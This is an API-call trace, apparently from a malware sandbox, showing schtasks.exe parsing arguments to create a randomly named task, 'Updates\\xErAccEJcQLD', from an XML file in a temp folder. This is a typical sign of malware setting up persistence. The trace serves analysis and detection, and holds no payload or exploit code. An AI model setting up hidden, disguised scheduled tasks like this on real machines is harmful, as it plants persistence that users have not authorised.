[0193.550] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0193.550] lstrlenW (lpString="|create|") returned 8
[0193.550] lstrlenW (lpString="|Create|") returned 8
[0193.550] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] lstrlenW (lpString="/TN") returned 3
[0193.550] lstrlenW (lpString="-/") returned 2
[0193.550] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.550] lstrlenW (lpString="?") returned 1
[0193.550] lstrlenW (lpString="?") returned 1
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|?|") returned 3
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] RtlRestoreLastWin32Error () returned 0x490
[0193.551] lstrlenW (lpString="create") returned 6
[0193.551] lstrlenW (lpString="create") returned 6
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|create|") returned 8
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0193.551] RtlRestoreLastWin32Error () returned 0x490
[0193.551] lstrlenW (lpString="delete") returned 6
[0193.551] lstrlenW (lpString="delete") returned 6
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|delete|") returned 8
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="query") returned 5
[0193.552] lstrlenW (lpString="query") returned 5
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.552] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0193.552] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.552] lstrlenW (lpString="|query|") returned 7
[0193.552] lstrlenW (lpString="|TN|") returned 4
[0193.552] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="change") returned 6
[0193.552] lstrlenW (lpString="change") returned 6
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.552] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0193.552] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.552] lstrlenW (lpString="|change|") returned 8
[0193.552] lstrlenW (lpString="|TN|") returned 4
[0193.552] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="run") returned 3
[0193.552] lstrlenW (lpString="run") returned 3
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.553] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0193.553] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.553] lstrlenW (lpString="|run|") returned 5
[0193.553] lstrlenW (lpString="|TN|") returned 4
[0193.553] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0193.553] RtlRestoreLastWin32Error () returned 0x490
[0193.553] lstrlenW (lpString="end") returned 3
[0193.553] lstrlenW (lpString="end") returned 3
[0193.553] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] lstrlenW (lpString="TN") returned 2
[0193.553] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0193.553] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.553] lstrlenW (lpString="|end|") returned 5
[0193.553] lstrlenW (lpString="|TN|") returned 4
[0193.553] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0193.553] RtlRestoreLastWin32Error () returned 0x490
[0193.553] lstrlenW (lpString="showsid") returned 7
[0193.553] lstrlenW (lpString="showsid") returned 7
[0193.553] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] GetProcessHeap () returned 0x4770000
[0193.553] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779368) returned 1
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x4779368, Size=0x16) returned 0x4779448
[0193.554] lstrlenW (lpString="TN") returned 2
[0193.554] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.554] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0193.554] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.554] lstrlenW (lpString="|showsid|") returned 9
[0193.554] lstrlenW (lpString="|TN|") returned 4
[0193.554] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="/TN") returned 3
[0193.554] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="/TN") returned 3
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x8) returned 0x4776c70
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779488
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.554] lstrlenW (lpString="-/") returned 2
[0193.554] StrChrIW (lpStart="-/", wMatch=0x4a30055) returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.555] StrChrIW (lpStart="Updates\\xErAccEJcQLD", wMatch=0x3a) returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.555] GetProcessHeap () returned 0x4770000
[0193.555] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x2a) returned 0x47770d0
[0193.555] GetProcessHeap () returned 0x4770000
[0193.555] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779328
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="/XML") returned 4
[0193.555] lstrlenW (lpString="-/") returned 2
[0193.555] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.555] lstrlenW (lpString="?") returned 1
[0193.555] lstrlenW (lpString="?") returned 1
[0193.555] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] lstrlenW (lpString="XML") returned 3
[0193.555] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.555] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.555] lstrlenW (lpString="|?|") returned 3
[0193.555] lstrlenW (lpString="|XML|") returned 5
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] lstrlenW (lpString="create") returned 6
[0193.555] lstrlenW (lpString="create") returned 6
[0193.555] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.556] lstrlenW (lpString="|create|") returned 8
[0193.556] lstrlenW (lpString="|XML|") returned 5
[0193.556] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0193.556] RtlRestoreLastWin32Error () returned 0x490
[0193.556] lstrlenW (lpString="delete") returned 6
[0193.556] lstrlenW (lpString="delete") returned 6
[0193.556] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.556] lstrlenW (lpString="|delete|") returned 8
[0193.556] lstrlenW (lpString="|XML|") returned 5
[0193.556] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0193.556] RtlRestoreLastWin32Error () returned 0x490
[0193.556] lstrlenW (lpString="query") returned 5
[0193.556] lstrlenW (lpString="query") returned 5
[0193.556] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|query|") returned 7
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.557] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0193.557] RtlRestoreLastWin32Error () returned 0x490
[0193.557] lstrlenW (lpString="change") returned 6
[0193.557] lstrlenW (lpString="change") returned 6
[0193.557] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] lstrlenW (lpString="XML") returned 3
[0193.557] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0193.557] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|change|") returned 8
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.557] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0193.557] RtlRestoreLastWin32Error () returned 0x490
[0193.557] lstrlenW (lpString="run") returned 3
[0193.557] lstrlenW (lpString="run") returned 3
[0193.557] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] lstrlenW (lpString="XML") returned 3
[0193.557] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0193.557] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|run|") returned 5
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] lstrlenW (lpString="end") returned 3
[0193.558] lstrlenW (lpString="end") returned 3
[0193.558] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] lstrlenW (lpString="XML") returned 3
[0193.558] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0193.558] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.558] lstrlenW (lpString="|end|") returned 5
[0193.558] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] lstrlenW (lpString="showsid") returned 7
[0193.558] lstrlenW (lpString="showsid") returned 7
[0193.558] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] lstrlenW (lpString="XML") returned 3
[0193.558] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0193.558] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.558] lstrlenW (lpString="|showsid|") returned 9
[0193.558] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x0
[0193.558] lstrlenW (lpString="/XML") returned 4
[0193.558] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="/XML") returned 4
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa) returned 0x47773f0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47796c8
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] lstrlenW (lpString="-/") returned 2
[0193.559] StrChrIW (lpStart="-/", wMatch=0x4a30043) returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp"
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47774b0
[0193.559] _memicmp (_Buf1=0x47774b0, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xc) returned 0x4777408
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x477aaa8
[0193.559] _memicmp (_Buf1=0x477aaa8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6e) returned 0x477ada8
[0193.559] RtlRestoreLastWin32Error () returned 0x7a
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C") returned 1
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6a) returned 0x477ae20
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794a8
[0193.560] RtlRestoreLastWin32Error () returned 0x0
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c70) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c70) returned 0x8
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c70) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779488) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779488) returned 0x14
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779488) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47770d0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47770d0) returned 0x2a
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47770d0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779328) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779328) returned 0x14
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779328) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773f0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773f0) returned 0xa
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773f0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47796c8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47796c8) returned 0x14
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47796c8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ae20) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ae20) returned 0x6a
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ae20) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794a8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794a8) returned 0x14
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794a8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777498) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777498) returned 0x10
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777498) returned 1
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0193.562] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0193.562] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0193.562] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] lstrlenW (lpString="create") returned 6
[0193.562] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0193.562] RtlRestoreLastWin32Error () returned 0x490
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] lstrlenW (lpString="create") returned 6
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779488
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x477ab20
[0193.562] _memicmp (_Buf1=0x477ab20, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x16) returned 0x4779628
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0193.562] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c
[0193.563] GetProcessHeap () returned 0x4770000
[0193.563] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779db8
[0193.563] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779db8 | out: lpData=0x4779db8) returned 1
[0193.563] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x477a168, puLen=0xdcf78) returned 1
[0193.563] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0193.563] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x4779f98, puLen=0xdcf80) returned 1
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString=".EXE") returned 4
[0193.563] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString=".EXE") returned 4
[0193.563] lstrlenW (lpString="schtasks") returned 8
[0193.563] lstrlenW (lpString="/create") returned 7
[0193.563] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16
[0193.563] _memicmp (_Buf1=0x4777480, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] GetProcessHeap () returned 0x4770000
[0193.563] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794a8
[0193.563] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
